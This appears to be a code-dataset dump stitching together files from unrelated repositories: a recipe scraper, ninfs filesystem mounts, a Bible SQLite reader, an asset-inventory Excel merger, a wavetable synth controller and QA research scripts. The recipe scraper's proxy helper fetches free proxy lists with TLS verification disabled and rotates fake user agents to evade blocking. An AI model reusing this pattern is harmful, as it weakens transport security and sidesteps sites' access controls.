#print(row.find_all('td')[1].string)
self.proxies.append({
'ip': row.find_all('td')[1].string,
'port': row.find_all('td')[2].string
})
except:
print("broken")
return proxies
def getProxy(self):
proxies = self.getProxyList()
proxies = self.getProxyList2(proxies)
proxy = random.choice(proxies)
return proxy
#### end proxy info added by ML
```
#### File: recipe-scrapers/recipe_scrapers/_proxy.py
```python
import requests
from lxml.html import fromstring
from fake_useragent import UserAgent
proxy_list_url = 'https://free-proxy-list.net/'
def get_proxies(verbose=False):
if verbose:
print("retriving updated proxy list...")
url = proxy_list_url
response = requests.get(url, verify=False)
parser = fromstring(response.text)
proxies = set()
for i in parser.xpath('//tbody/tr'):
if not i.xpath('.//td[7][contains(text(),"yes")]'):
proxy = ":".join([
i.xpath('.//td[1]/text()')[0],
i.xpath('.//td[2]/text()')[0]])
proxies.add('http://' + proxy)
if verbose:
print("Found %s avaliable proxies." % len(proxies))
return list(proxies)
__all__ = ['get_proxies']
def get_user_agents_generator(verbose=False, verify_ssl=False):
if verbose:
print("retriving updated user-agent list...")
ua = UserAgent(verify_ssl=verify_ssl)
ua.update()
if verbose:
print("Done.")
return ua
__all__ += ['get_user_agents_generator']
```
#### File: recipe-scrapers/recipe_scrapers/taste.py
```python
from ._abstract import AbstractScraper
from ._utils import get_minutes, normalize_string
class Taste(AbstractScraper):
@classmethod
def host(self):
return ['taste.com.au']
def title(self):
return self.soup.find('h1').get_text()
def ingredients(self):
ingredients_html = self.soup.findAll('div', {'class': 'ingredient-description'})
return [
normalize_string(ingredient.get_text())
for ingredient in ingredients_html
]
def instructions(self):
instructions_html = self.soup.findAll('div', {'class': 'recipe-method-step-content'})
return '\n'.join([
normalize_string(instruction.get_text())
for instruction in instructions_html
])
def categories(self):
categories_html = self.soup.findAll('meta', {'name': 'keywords'})
return [
normalize_string(c) for category in categories_html
for c in category['content'].split(',')
]
def image_url(self):
image_html = self.soup.find('meta', {'property': 'og:image'})
return image_html['content']
``` |
{
"source": "Jhynjhiruu/ninfs",
"score": 2
} |
#### File: ninfs/gui/confighandler.py
```python
from configparser import ConfigParser
from os import environ, makedirs
from os.path import expanduser, isdir, join
from sys import platform
from threading import Lock
__all__ = ['get_bool', 'set_bool']
CONFIG_FILENAME = 'config.ini'
home = expanduser('~')
lock = Lock()
if platform == 'win32':
config_dir = join(environ['APPDATA'], 'ninfs')
elif platform == 'darwin':
config_dir = join(home, 'Library', 'Application Support', 'ninfs')
else:
# probably linux or bsd or something
# if by some chance an OS uses different paths, feel free to let me know or make a PR
config_root = environ.get('XDG_CONFIG_HOME')
if not config_root:
# check other paths in XDG_CONFIG_DIRS to see if ninfs already exists in one of them
config_roots = environ.get('XDG_CONFIG_DIRS')
if not config_roots:
config_roots = '/etc/xdg'
config_paths = config_roots.split(':')
for path in config_paths:
d = join(path, 'ninfs')
if isdir(d):
config_root = d
break
# check again to see if it was set
if not config_root:
config_root = join(home, '.config')
config_dir = join(config_root, 'ninfs')
makedirs(config_dir, exist_ok=True)
config_file = join(config_dir, CONFIG_FILENAME)
parser = ConfigParser()
# defaults
parser['update'] = {}
parser['update']['onlinecheck'] = 'false'
parser['internal'] = {}
parser['internal']['askedonlinecheck'] = 'false'
def save_config():
with lock:
print('Saving to:', config_file)
with open(config_file, 'w') as f:
parser.write(f)
def get_bool(section: 'str', key: 'str'):
return parser.getboolean(section, key)
def set_bool(section: 'str', key: 'str', value: bool):
parser.set(section, key, 'true' if value else 'false')
save_config()
# load user config if possible
loaded = parser.read(config_file)
if not loaded:
save_config()
```
#### File: ninfs/gui/outputviewer.py
```python
import tkinter as tk
import tkinter.ttk as ttk
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import Iterable
class OutputViewer(ttk.Frame):
def __init__(self, parent: 'tk.BaseWidget' = None, *, output: 'Iterable[str]'):
super().__init__(parent)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.columnconfigure(1, weight=0)
scrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
scrollbar.grid(row=0, column=1, sticky=tk.NSEW)
textarea = tk.Text(self, wrap='word', yscrollcommand=scrollbar.set)
textarea.grid(row=0, column=0, sticky=tk.NSEW)
scrollbar.configure(command=textarea.yview)
for line in output:
textarea.insert(tk.END, line + '\n')
textarea.see(tk.END)
textarea.configure(state=tk.DISABLED)
```
#### File: gui/setupwizard/exefs.py
```python
import tkinter as tk
from typing import TYPE_CHECKING
from .base import WizardBase
if TYPE_CHECKING:
from .. import WizardContainer
class ExeFSSetup(WizardBase):
def __init__(self, parent: 'tk.BaseWidget' = None, *, wizardcontainer: 'WizardContainer'):
super().__init__(parent, wizardcontainer=wizardcontainer)
def callback(*_):
main_file = self.main_textbox_var.get().strip()
self.wizardcontainer.set_next_enabled(main_file)
main_container, main_textbox, main_textbox_var = self.make_file_picker('Select the ExeFS file:',
'Select ExeFS file')
main_container.pack(fill=tk.X, expand=True)
self.main_textbox_var = main_textbox_var
main_textbox_var.trace_add('write', callback)
self.set_header_suffix('ExeFS')
def next_pressed(self):
main_file = self.main_textbox_var.get().strip()
args = ['exefs', main_file]
self.wizardcontainer.show_mount_point_selector('ExeFS', args)
```
#### File: ninfs/mount/nandbb.py
```python
import logging
from errno import ENOENT, EROFS
from stat import S_IFDIR, S_IFREG
from sys import exit, argv
from typing import BinaryIO
from pyctr.util import readbe
from . import _common as _c
# _common imports these from fusepy, and prints an error if it fails; this allows less duplicated code
from ._common import FUSE, FuseOSError, Operations, LoggingMixIn, fuse_get_context, get_time, realpath
class BBNandImageMount(LoggingMixIn, Operations):
fd = 0
def __init__(self, nand_fp: BinaryIO, g_stat: dict):
self.g_stat = g_stat
self.files = {}
self.f = nand_fp
def __del__(self, *args):
try:
self.f.close()
except AttributeError:
pass
destroy = __del__
def init(self, path):
nand_size = self.f.seek(0, 2)
if nand_size != 0x4000000:
exit(f'NAND size is incorrect (expected 0x4000000, got {nand_size:#X})')
bbfs_blocks = []
self.f.seek(0xFF0 * 0x4000)
for i in range(0x10):
bbfs_blocks.append(self.f.read(0x4000))
self.f.seek(0)
latest_seqno = -1
latest_bbfs_block = None
for i, j in enumerate(bbfs_blocks):
header = j[0x3FF4:]
magic = header[:4]
if magic == b"\0x00\0x00\0x00\0x00":
continue
if magic not in [b"BBFS", b"BBFL"]:
exit(f'Invalid BBFS magic: expected b"BBFS" or b"BBFL", got {magic.hex().upper()}')
calculated_checksum = 0
for k in range(0, 0x4000, 2):
calculated_checksum += readbe(j[k:k + 2])
if calculated_checksum & 0xFFFF != 0xCAD7:
exit(f'BBFS block {i} has an invalid checksum')
seqno = readbe(header[4:8])
if seqno > latest_seqno:
latest_seqno = seqno
latest_bbfs_block = i
if latest_bbfs_block == None or latest_seqno == -1:
exit(f'Blank BBFS (all BBFS magics were 00000000)')
self.used = 0
for i in range(0x2000, 0x3FF4, 0x14):
entry = bbfs_blocks[latest_bbfs_block][i:i + 0x14]
valid = bool(entry[11])
u = readbe(entry[12:14])
start = u - (u & 0x8000) * 2
if valid and start != -1:
name = entry[:8].decode().rstrip("\x00")
ext = entry[8:11].decode().rstrip("\x00")
size = readbe(entry[16:20])
self.files[f'/{name}.{ext}'] = {'start': start, 'size': size}
self.used += size // 0x4000
fat = bbfs_blocks[latest_bbfs_block][:0x2000]
self.fat_entries = []
for i in range(0, len(fat), 2):
u = readbe(fat[i:i + 2])
s = u - (u & 0x8000) * 2
self.fat_entries.append(s)
def flush(self, path, fh):
return self.f.flush()
@_c.ensure_lower_path
def getattr(self, path, fh=None):
uid, gid, pid = fuse_get_context()
if path == '/':
st = {'st_mode': (S_IFDIR | (0o555)), 'st_nlink': 2}
elif path in self.files:
st = {'st_mode': (S_IFREG | (0o444)),
'st_size': self.files[path]['size'], 'st_nlink': 1}
else:
raise FuseOSError(ENOENT)
return {**st, **self.g_stat, 'st_uid': uid, 'st_gid': gid}
def open(self, path, flags):
self.fd += 1
return self.fd
@_c.ensure_lower_path
def readdir(self, path, fh):
yield from ('.', '..')
yield from (x[1:] for x in self.files)
@_c.ensure_lower_path
def read(self, path, size, offset, fh):
fi = self.files[path]
if offset > fi['size']:
return b''
data = bytearray()
block = fi['start']
while True:
self.f.seek(block * 0x4000)
data.extend(self.f.read(0x4000))
block = self.fat_entries[block]
if block == -1:
break
if block in [0, -2, -3]:
return b''
if len(data) != fi['size']:
return b''
if offset + size > fi['size']:
size = fi['size'] - offset
return bytes(data[offset:offset + size])
@_c.ensure_lower_path
def statfs(self, path):
return {'f_bsize': 0x4000, 'f_frsize': 0x4000, 'f_blocks': 0xFF0 - 0x40, 'f_bavail': 0xFF0 - 0x40 - self.used,
'f_bfree': 0xFF0 - 0x40 - self.used, 'f_files': len(self.files)}
@_c.ensure_lower_path
def write(self, path, data, offset, fh):
raise FuseOSError(EROFS)
def main(prog: str = None, args: list = None):
from argparse import ArgumentParser
if args is None:
args = argv[1:]
parser = ArgumentParser(prog=prog, description='Mount iQue Player NAND images.',
parents=(_c.default_argp, _c.main_args('nand', 'iQue Player NAND image')))
a = parser.parse_args(args)
opts = dict(_c.parse_fuse_opts(a.o))
if a.do:
logging.basicConfig(level=logging.DEBUG, filename=a.do)
nand_stat = get_time(a.nand)
with open(a.nand, 'rb') as f:
mount = BBNandImageMount(nand_fp=f, g_stat=nand_stat)
if _c.macos or _c.windows:
opts['fstypename'] = 'BBFS'
# assuming / is the path separator since macos. but if windows gets support for this,
# it will have to be done differently.
if _c.macos:
path_to_show = realpath(a.nand).rsplit('/', maxsplit=2)
opts['volname'] = f'iQue Player NAND ({path_to_show[-2]}/{path_to_show[-1]})'
elif _c.windows:
# volume label can only be up to 32 chars
opts['volname'] = 'iQue Player NAND'
FUSE(mount, a.mount_point, foreground=a.fg or a.d, ro=True, nothreads=True, debug=a.d,
fsname=realpath(a.nand).replace(',', '_'), **opts)
``` |
{
"source": "jhyoo1220/bible-reading-plan",
"score": 3
} |
#### File: bible-reading-plan/bible_reading_plain/sql_connector.py
```python
import sqlite3
from reading import Reading
class SQLConnector(object):
QUERY = """
SELECT * FROM {book}
WHERE chapter IN ({chapters})
ORDER BY chapter ASC, verse ASC, verseIdx ASC
"""
def __init__(self, db_file: str):
self._conn = sqlite3.connect(db_file)
self._cursor = self._conn.cursor()
def _parse_row(self, row: object) -> dict:
try:
return {
"chapter": int(row[1]),
"verse": int(row[2]),
"divided_verse": int(row[3]),
"type": int(row[4]),
"text": row[5],
}
except KeyError:
return None
def read_text_list(self, reading: Reading) -> list:
db_params = reading.get_db_params()
formatted_query = self.QUERY.format(**db_params)
self._cursor.execute(formatted_query)
results = []
for row in self._cursor:
curr_result = self._parse_row(row)
if reading.is_target(curr_result["chapter"], curr_result["verse"]):
results.append(curr_result)
return results
def close_connection(self):
self._conn.close()
``` |
{
"source": "jhyoung09/ITAM-Crawler",
"score": 3
} |
#### File: jhyoung09/ITAM-Crawler/ITAM-Compile.py
```python
import openpyxl
# global variables
preWB = openpyxl.load_workbook('AssetInventory-PRE.xlsx')
preSheet = preWB['Computers']
postWB = openpyxl.load_workbook('AssetInventory-POST.xlsx')
postSheet = postWB['Computers']
itamReport = openpyxl.load_workbook('base.xlsx')
itamSheet = itamReport['Asset to Location Tracking All']
def getData(sheetObj):
assetData = []
print('Opening workbook...')
print('... grabbing data...')
for row in range(2, sheetObj.max_row + 1):
PCN = sheetObj.cell(row=row, column=2).value
if PCN is None:
# ignore those rows which have an empty PCN (assuming that it must be present)
continue
if PCN == "n/a":
# special case to deal with integer comparison where PCN was set to n/a
PCN = 0
deviceType = sheetObj.cell(row=row, column=3).value
deviceSN = sheetObj.cell(row=row, column=1).value
userID = sheetObj.cell(row=row, column=6).value
assetData.append([PCN, deviceType, deviceSN, userID])
return assetData
def write_data(finalData):
print('writing data...')
for rowNum in range(3,len(finalData) + 3): # skipping the first 2 rows because of headers
for colNum in range(len(finalData[rowNum - 3])):
itamSheet.cell(row=rowNum, column=colNum + 1).value = finalData[rowNum - 3][colNum]
print('data written in sheet... saving workbook...')
itamReport.save('pythonCrawl_master.xlsx')
print('workbook saved...')
def gather_data(preData, postData):
preData.sort()
postDataSort = sorted(postData)
finalData = []
preIndex = 0
while preIndex < len(preData):
foundMatch = False
for postItem in postDataSort:
if preData[preIndex][0] == postItem[0]:
finalData.append(preData[preIndex] +[""] + postItem)
foundMatch = True
postDataSort.remove(postItem)
if not foundMatch:
finalData.append(preData[preIndex] + ["", "", "", "", ""])
preIndex += 1
for postItem in postDataSort:
finalData.append(["", "", "", "", ""] + postItem)
#print("This is data that has been correlated together if possible")
#for item in finalData:
# print(item)
return finalData
def main():
preAssetData = getData(preSheet)
postAssetData = getData(postSheet)
finalAssetData = gather_data(preAssetData, postAssetData)
#print(preAssetData)
#print(postAssetData)
print('...determining how much data is being parsed...')
print(len(finalAssetData))
write_data(finalAssetData)
print('...DONE!!')
main()
``` |
{
"source": "jhyrkas/wavaetable",
"score": 2
} |
#### File: jhyrkas/wavaetable/nn_osc_controller.py
```python
import librosa
import math
import numpy as np
import sounddevice as sd
import soundfile as sf
import torch
import sys
from pythonosc import osc_message_builder
from pythonosc.dispatcher import Dispatcher
from pythonosc.osc_server import BlockingOSCUDPServer
from pythonosc.udp_client import SimpleUDPClient
from typing import List, Any
from vae_stft import vae_stft
# osc code based on https://python-osc.readthedocs.io/en/latest/dispatcher.html
z = np.zeros(16)
wt = np.zeros(512)
client = SimpleUDPClient("127.0.0.1", 7771)
def update_z(address: str, *args: List[Any]) -> None:
global z
if not address[:6] == "/param" :
return
# not doing much error checking here
i = int(address[6:])
v = float(args[0])
z[i] = v
def update_wavetable(vae) :
global wt
global z
gain = 0.75
z_size = 16
fs = 16000
length = 3
hop_length = 512
n_reps = length * int(fs / hop_length)
data_size = 1025
X_hat = vae.decode(torch.from_numpy(z).float()).detach()
x_hat = librosa.griffinlim(np.repeat(X_hat.numpy().reshape(data_size,1), n_reps, axis=1))
x_hat = gain * (x_hat / np.max(np.abs(x_hat)))
f0_hat_frames, voiced_hat, _ = librosa.pyin(x_hat, librosa.note_to_hz('C2'), librosa.note_to_hz('C7'), sr=fs)
f0_hat = np.mean(f0_hat_frames[voiced_hat]) if np.sum(voiced_hat) > 10 else 0 # at least 10 voiced frames?
if f0_hat == 0 :
print('F0 ESTIMATION FAILED')
return False # something here...
cycle_samps = 512 # for max's cycle object
new_fs = math.ceil(cycle_samps * f0_hat)
new_x_hat = librosa.resample(x_hat, fs, new_fs)
new_x_hat = new_x_hat / np.max(np.abs(new_x_hat))
start_index = new_fs//2 # avoid silence at beginning?
looping = True
while looping and start_index < len(new_x_hat):
if math.isclose(new_x_hat[start_index], 0.0, abs_tol=0.001) :
looping = False
else :
start_index += 1
if start_index + cycle_samps <= len(new_x_hat) :
wt = new_x_hat[start_index:start_index+cycle_samps]
return True
else :
print('ERROR IN WAVETABLE GENERATION')
return False
def send_wavetable(address: str, fixed_args: List[Any], *osc_args: List[Any]) -> None :
global client
global wt
vae = fixed_args[0]
if update_wavetable(vae) :
try :
tmp = wt.astype(np.float32)
builder = osc_message_builder.OscMessageBuilder(address="/scRecv")
builder.add_arg(tmp.tobytes(), builder.ARG_TYPE_BLOB)
message = builder.build()
client.send_message("/scRecv", message)
print('sent wavetable')
except :
# had an infinite value once but i missed the exception type or where it occurred...
client.send_message("/scErr", 0) # not sure if we have to send a "message"
def listen_to_timbre(address: str, fixed_args: List[Any], *osc_args: List[Any]) -> None :
global wt
vae = fixed_args[0]
if update_wavetable(vae) :
gain = 0.5
fs = 44100
sig = np.tile(wt, (3*44100) // len(wt)) * .666
sd.play(sig, fs)
if __name__ == '__main__' :
# OSC set up
dispatcher = Dispatcher()
# NN set up
vae = vae_stft()
vae.load_state_dict(torch.load('vae_stft_model_params.pytorch'))
vae.eval()
dispatcher.map("/param*", update_z)
dispatcher.map("/generate", send_wavetable, vae)
dispatcher.map("/listen", listen_to_timbre, vae)
server = BlockingOSCUDPServer(("127.0.0.1", 1337), dispatcher)
while True :
server.handle_request()
``` |
{
"source": "jhyuklee/biobert",
"score": 2
} |
#### File: jhyuklee/biobert/merge_yesno.py
```python
import json
import os
import argparse
import random
from tqdm import tqdm
def p_counter(data):
p_cnt = 0
for article in data:
for paragraph in article['paragraphs']:
p_cnt += 1
return p_cnt
def merge(args):
# Prepare datasets and na-probs
with open(args.gt_file, 'r') as fp:
data = json.load(fp)['data']
with open(args.na_prob_file, 'r') as fp:
na_probs = json.load(fp)
qid2ans = {}
for article in data:
for paragraph in article['paragraphs']:
for qa in paragraph['qas']:
if 'answers' in qa:
qid2ans[qa['id']] = qa['answers']
else:
qid2ans[qa['id']] = 'yes'
assert set(qid2ans.keys()) == set(na_probs.keys())
# Merge them using a single qid
merge_score = {}
merge_cnt = {}
for qid in qid2ans:
out_qid = qid.split('_')[0]
if not out_qid in merge_score:
merge_score[out_qid] = []
merge_cnt[out_qid] = 0.0
merge_score[out_qid].append(na_probs[qid])
merge_cnt[out_qid] += 1
assert len(qid2ans) == sum([k for k in merge_cnt.values()])
merge_score = {qid: sum(merge_score[qid])/merge_cnt[qid] for qid in merge_score}
# merge_score = {qid: min(merge_score[qid]) for qid in merge_score}
# Dump na_prob json
with open(args.na_prob_out_path, 'w') as fp:
json.dump(merge_score, fp)
# New dataset without duplicates
checker = []
to_data = []
for article in data:
to_article = {'paragraphs': [], 'title': article['title']}
for paragraph in article['paragraphs']:
assert len(paragraph['qas']) == 1
out_qid = paragraph['qas'][0]['id'].split('_')[0]
if out_qid in checker:
continue
else:
checker.append(out_qid)
paragraph['qas'][0]['id'] = out_qid
to_article['paragraphs'].append({'context': paragraph['context'], 'qas': paragraph['qas']})
to_data.append(to_article)
# Dump new dataset json
with open(args.gt_out_path, 'w') as fp:
json.dump({'data': to_data}, fp)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('gt_file')
parser.add_argument('na_prob_file')
parser.add_argument('gt_out_path')
parser.add_argument('na_prob_out_path')
return parser.parse_args()
def main():
args = get_args()
merge(args)
print('File merged as {} and {}\n'.format(args.gt_out_path, args.na_prob_out_path))
if __name__ == '__main__':
main()
``` |
{
"source": "jhyuklee/piqa",
"score": 2
} |
#### File: squad/base/file_interface.py
```python
import json
import os
import torch
import scipy.sparse
import numpy as np
import csv
class FileInterface(object):
def __init__(self, save_dir, report_path, pred_path, question_emb_dir, context_emb_dir,
cache_path, dump_dir, train_path, test_path, draft, **kwargs):
self._train_path = train_path
self._test_path = test_path
self._save_dir = save_dir
self._report_path = report_path
self._dump_dir = dump_dir
self._pred_path = pred_path
self._question_emb_dir = question_emb_dir
self._context_emb_dir = context_emb_dir
self._cache_path = cache_path
self._draft = draft
self._save = None
self._load = None
self._report_header = []
self._report = []
self._kwargs = kwargs
def _bind(self, save=None, load=None):
self._save = save
self._load = load
def save(self, iteration, save_fn=None):
filename = os.path.join(self._save_dir, str(iteration))
if not os.path.exists(filename):
os.makedirs(filename)
if save_fn is None:
save_fn = self._save
save_fn(filename)
def load(self, iteration, load_fn=None, session=None):
if session is None:
session = self._save_dir
filename = os.path.join(session, str(iteration), 'model.pt')
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
if load_fn is None:
load_fn = self._load
load_fn(filename)
def pred(self, pred):
if not os.path.exists(os.path.dirname(self._pred_path)):
os.makedirs(os.path.dirname(self._pred_path))
with open(self._pred_path, 'w') as fp:
json.dump(pred, fp)
print('Prediction saved at %s' % self._pred_path)
def report(self, summary=False, **kwargs):
if not os.path.exists(os.path.dirname(self._report_path)):
os.makedirs(os.path.dirname(self._report_path))
if len(self._report) == 0 and os.path.exists(self._report_path):
with open(self._report_path, 'r') as fp:
reader = csv.DictReader(fp, delimiter=',')
rows = list(reader)
for key in rows[0]:
if key not in self._report_header:
self._report_header.append(key)
self._report.extend(rows)
for key, val in kwargs.items():
if key not in self._report_header:
self._report_header.append(key)
self._report.append(kwargs)
with open(self._report_path, 'w') as fp:
writer = csv.DictWriter(fp, delimiter=',', fieldnames=self._report_header)
writer.writeheader()
writer.writerows(self._report)
return ', '.join('%s=%.5r' % (s, r) for s, r in kwargs.items())
def question_emb(self, id_, emb, emb_type='dense'):
if not os.path.exists(self._question_emb_dir):
os.makedirs(self._question_emb_dir)
savez = scipy.sparse.save_npz if emb_type == 'sparse' else np.savez
path = os.path.join(self._question_emb_dir, '%s.npz' % id_)
savez(path, emb)
def context_emb(self, id_, phrases, emb, emb_type='dense'):
if not os.path.exists(self._context_emb_dir):
os.makedirs(self._context_emb_dir)
savez = scipy.sparse.save_npz if emb_type == 'sparse' else np.savez
emb_path = os.path.join(self._context_emb_dir, '%s.npz' % id_)
json_path = os.path.join(self._context_emb_dir, '%s.json' % id_)
if os.path.exists(emb_path):
print('Skipping %s; already exists' % emb_path)
else:
savez(emb_path, emb)
if os.path.exists(json_path):
print('Skipping %s; already exists' % json_path)
else:
with open(json_path, 'w') as fp:
json.dump(phrases, fp)
def cache(self, preprocess, args):
if os.path.exists(self._cache_path):
return torch.load(self._cache_path)
out = preprocess(self, args)
torch.save(out, self._cache_path)
return out
def dump(self, batch_idx, item):
filename = os.path.join(self._dump_dir, '%s.pt' % str(batch_idx).zfill(6))
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(item, filename)
def bind(self, processor, model, optimizer=None):
def load(filename, **kwargs):
# filename = os.path.join(filename, 'model.pt')
state = torch.load(filename)
processor.load_state_dict(state['preprocessor'])
model.load_state_dict(state['model'])
if 'optimizer' in state and optimizer:
optimizer.load_state_dict(state['optimizer'])
print('Model loaded from %s' % filename)
def save(filename, **kwargs):
state = {
'preprocessor': processor.state_dict(),
'model': model.state_dict(),
'optimizer': optimizer.state_dict()
}
filename = os.path.join(filename, 'model.pt')
torch.save(state, filename)
print('Model saved at %s' % filename)
def infer(input, top_k=100):
# input = {'id': '', 'question': '', 'context': ''}
model.eval()
self._bind(save=save, load=load)
def load_train(self):
raise NotImplementedError()
def load_test(self):
raise NotImplementedError()
def load_metadata(self):
raise NotImplementedError()
```
#### File: squad/base/processor.py
```python
from abc import ABCMeta
import torch.utils.data
class Processor(metaclass=ABCMeta):
def construct(self, examples, metadata):
raise NotImplementedError()
def state_dict(self):
raise NotImplementedError()
def load_state_dict(self, in_):
raise NotImplementedError()
def preprocess(self, example):
raise NotImplementedError()
def postprocess(self, example, model_output):
raise NotImplementedError()
def postprocess_batch(self, dataset, model_input, model_output):
raise NotImplementedError()
def postprocess_context(self, example, context_output):
raise NotImplementedError()
def postprocess_context_batch(self, dataset, model_input, context_output):
raise NotImplementedError()
def postprocess_question(self, example, question_output):
raise NotImplementedError()
def postprocess_question_batch(self, dataset, model_input, question_output):
raise NotImplementedError()
def collate(self, examples):
raise NotImplementedError()
def process_metadata(self, metadata):
raise NotImplementedError()
def get_dump(self, dataset, input_, output, results):
raise NotImplementedError()
class Sampler(torch.utils.data.Sampler, metaclass=ABCMeta):
def __init__(self, dataset, data_type, **kwargs):
self.dataset = dataset
self.data_type = data_type
``` |
{
"source": "jhyuklee/sparc",
"score": 2
} |
#### File: jhyuklee/sparc/mips_phrase.py
```python
import argparse
import json
import os
import random
import logging
from collections import namedtuple, Counter
from time import time
import h5py
import numpy as np
import faiss
import torch
from tqdm import tqdm
from scipy.sparse import vstack
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
class MIPS(object):
def __init__(self, phrase_dump_dir, tfidf_dump_dir, start_index_path, idx2id_path, max_norm_path,
doc_rank_fn, cuda=False, dump_only=False):
# If dump dir is a file, use it as a dump.
if os.path.isdir(phrase_dump_dir):
self.phrase_dump_paths = sorted(
[os.path.join(phrase_dump_dir, name) for name in os.listdir(phrase_dump_dir) if 'hdf5' in name]
)
dump_names = [os.path.splitext(os.path.basename(path))[0] for path in self.phrase_dump_paths]
self.dump_ranges = [list(map(int, name.split('-'))) for name in dump_names]
else:
self.phrase_dump_paths = [phrase_dump_dir]
self.phrase_dumps = [h5py.File(path, 'r') for path in self.phrase_dump_paths]
# Load tfidf dump
assert os.path.isdir(tfidf_dump_dir), tfidf_dump_dir
self.tfidf_dump_paths = sorted(
[os.path.join(tfidf_dump_dir, name) for name in os.listdir(tfidf_dump_dir) if 'hdf5' in name]
)
tfidf_dump_names = [os.path.splitext(os.path.basename(path))[0] for path in self.tfidf_dump_paths]
if '-' in tfidf_dump_names[0]: # Range check
tfidf_dump_ranges = [list(map(int, name.split('_')[0].split('-'))) for name in tfidf_dump_names]
assert tfidf_dump_ranges == self.dump_ranges
self.tfidf_dumps = [h5py.File(path, 'r') for path in self.tfidf_dump_paths]
logger.info(f'using doc ranker functions: {doc_rank_fn["index"]}')
self.doc_rank_fn = doc_rank_fn
if dump_only:
return
# Read index
logger.info(f'Reading {start_index_path}')
self.start_index = faiss.read_index(start_index_path, faiss.IO_FLAG_ONDISK_SAME_DIR)
self.idx_f = self.load_idx_f(idx2id_path)
with open(max_norm_path, 'r') as fp:
self.max_norm = json.load(fp)
# Options
self.num_docs_list = []
self.cuda = cuda
if self.cuda:
assert torch.cuda.is_available(), f"Cuda availability {torch.cuda.is_available()}"
self.device = torch.device('cuda')
else:
self.device = torch.device("cpu")
def close(self):
for phrase_dump in self.phrase_dumps:
phrase_dump.close()
for tfidf_dump in self.tfidf_dumps:
tfidf_dump.close()
def load_idx_f(self, idx2id_path):
idx_f = {}
types = ['doc', 'word']
with h5py.File(idx2id_path, 'r', driver='core', backing_store=False) as f:
for key in tqdm(f, desc='loading idx2id'):
idx_f_cur = {}
for type_ in types:
idx_f_cur[type_] = f[key][type_][:]
idx_f[key] = idx_f_cur
return idx_f
def get_idxs(self, I):
offsets = (I / 1e8).astype(np.int64) * int(1e8)
idxs = I % int(1e8)
doc = np.array(
[[self.idx_f[str(offset)]['doc'][idx] for offset, idx in zip(oo, ii)] for oo, ii in zip(offsets, idxs)])
word = np.array([[self.idx_f[str(offset)]['word'][idx] for offset, idx in zip(oo, ii)] for oo, ii in
zip(offsets, idxs)])
return doc, word
def get_doc_group(self, doc_idx):
if len(self.phrase_dumps) == 1:
return self.phrase_dumps[0][str(doc_idx)]
for dump_range, dump in zip(self.dump_ranges, self.phrase_dumps):
if dump_range[0] * 1000 <= int(doc_idx) < dump_range[1] * 1000:
if str(doc_idx) not in dump:
raise ValueError('%d not found in dump list' % int(doc_idx))
return dump[str(doc_idx)]
# Just check last
if str(doc_idx) not in self.phrase_dumps[-1]:
raise ValueError('%d not found in dump list' % int(doc_idx))
else:
return self.phrase_dumps[-1][str(doc_idx)]
def get_tfidf_group(self, doc_idx):
if len(self.tfidf_dumps) == 1:
return self.tfidf_dumps[0][str(doc_idx)]
for dump_range, dump in zip(self.dump_ranges, self.tfidf_dumps):
if dump_range[0] * 1000 <= int(doc_idx) < dump_range[1] * 1000:
return dump[str(doc_idx)]
# Just check last
if str(doc_idx) not in self.tfidf_dumps[-1]:
raise ValueError('%d not found in dump list' % int(doc_idx))
else:
return self.tfidf_dumps[-1][str(doc_idx)]
def int8_to_float(self, num, offset, factor):
return num.astype(np.float32) / factor + offset
def adjust(self, each):
last = each['context'].rfind(' [PAR] ', 0, each['start_pos'])
last = 0 if last == -1 else last + len(' [PAR] ')
next = each['context'].find(' [PAR] ', each['end_pos'])
next = len(each['context']) if next == -1 else next
each['context'] = each['context'][last:next]
each['start_pos'] -= last
each['end_pos'] -= last
return each
def scale_l2_to_ip(self, l2_scores, max_norm=None, query_norm=None):
"""
sqrt(m^2 + q^2 - 2qx) -> m^2 + q^2 - 2qx -> qx - 0.5 (q^2 + m^2)
Note that faiss index returns squared euclidean distance, so no need to square it again.
"""
if max_norm is None:
return -0.5 * l2_scores
assert query_norm is not None
return -0.5 * (l2_scores - query_norm ** 2 - max_norm ** 2)
def dequant(self, group, input_, attr='dense'):
if 'offset' not in group.attrs:
return input_
if attr == 'dense':
return self.int8_to_float(input_, group.attrs['offset'], group.attrs['scale'])
elif attr == 'sparse':
return self.int8_to_float(input_, group.attrs['sparse_offset'], group.attrs['sparse_scale'])
else:
raise NotImplementedError()
def sparse_bmm(self, q_ids, q_vals, p_ids, p_vals):
"""
Efficient batch inner product after slicing (matrix x matrix)
"""
q_max = max([len(q) for q in q_ids])
p_max = max([len(p) for p in p_ids])
factor = len(p_ids)//len(q_ids)
assert q_max == max([len(q) for q in q_vals]) and p_max == max([len(p) for p in p_vals])
with torch.no_grad():
q_ids_pad = torch.LongTensor([q_id.tolist() + [0]*(q_max-len(q_id)) for q_id in q_ids]).to(self.device)
q_ids_pad = q_ids_pad.repeat(1, factor).view(len(p_ids), -1) # Repeat for p
q_vals_pad = torch.FloatTensor([q_val.tolist() + [0]*(q_max-len(q_val)) for q_val in q_vals]).to(self.device)
q_vals_pad = q_vals_pad.repeat(1, factor).view(len(p_vals), -1) # Repeat for p
p_ids_pad = torch.LongTensor([p_id.tolist() + [0]*(p_max-len(p_id)) for p_id in p_ids]).to(self.device)
p_vals_pad = torch.FloatTensor([p_val.tolist() + [0]*(p_max-len(p_val)) for p_val in p_vals]).to(self.device)
id_map = q_ids_pad.unsqueeze(1)
id_map_ = p_ids_pad.unsqueeze(2)
match = (id_map == id_map_).to(torch.float32)
val_map = q_vals_pad.unsqueeze(1)
val_map_ = p_vals_pad.unsqueeze(2)
sp_scores = ((val_map * val_map_) * match).sum([1, 2])
return sp_scores.cpu().numpy()
def search_dense(self, q_texts, query_start, start_top_k, nprobe, sparse_weight=0.05):
batch_size = query_start.shape[0]
self.start_index.nprobe = nprobe
# Query concatenation for l2 to ip
query_start = np.concatenate([np.zeros([batch_size, 1]).astype(np.float32), query_start], axis=1)
# Search with faiss
